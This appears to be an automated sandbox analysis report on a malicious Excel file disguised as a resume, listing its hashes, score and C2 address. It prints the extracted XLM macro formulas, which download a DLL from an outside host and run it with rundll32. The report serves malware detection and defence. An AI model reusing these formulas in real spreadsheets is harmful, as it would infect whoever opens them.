Resubmissions

10-04-2022 07:53

220410-jq25nsgaen 10

10-04-2020 08:18

200410-tmzpvazbjn 10

General

  • Target

    William Smith Resume.xls

  • Size

    163KB

  • Sample

    200410-tmzpvazbjn

  • MD5

    0a054818926d97f4100774255a908dba

  • SHA1

    de572eddd30b34d1e328c8d5fb986cc1e04c82e8

  • SHA256

    0fba1f02cd2872efc4cdc6806bc49d786005f590971ee31f97ce71c1ccf87fe2

  • SHA512

    21659d1132eef51aaf43f7c3dffde06e7018e7d9847c7a7106eb9aee2747f9c6a967a80ab052db17903b0ac9cb63ee3c8371725f4206decff13dbbe996bcf3f1

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://march262020.com/files/april8.dll

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://march262020.com/files/april8.dll","C:\ProgramData\ieTneVi.dll",0,0) =CALL("Shell32","ShellExecuteA",AE1177,0,"Open","rundll32.exe","C:\ProgramData\ieTneVi.dll,DllRegisterServer",0,0) =HALT()

Targets

    • Target

      William Smith Resume.xls

    • Size

      163KB

    • MD5

      0a054818926d97f4100774255a908dba

    • SHA1

      de572eddd30b34d1e328c8d5fb986cc1e04c82e8

    • SHA256

      0fba1f02cd2872efc4cdc6806bc49d786005f590971ee31f97ce71c1ccf87fe2

    • SHA512

      21659d1132eef51aaf43f7c3dffde06e7018e7d9847c7a7106eb9aee2747f9c6a967a80ab052db17903b0ac9cb63ee3c8371725f4206decff13dbbe996bcf3f1

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v6

Tasks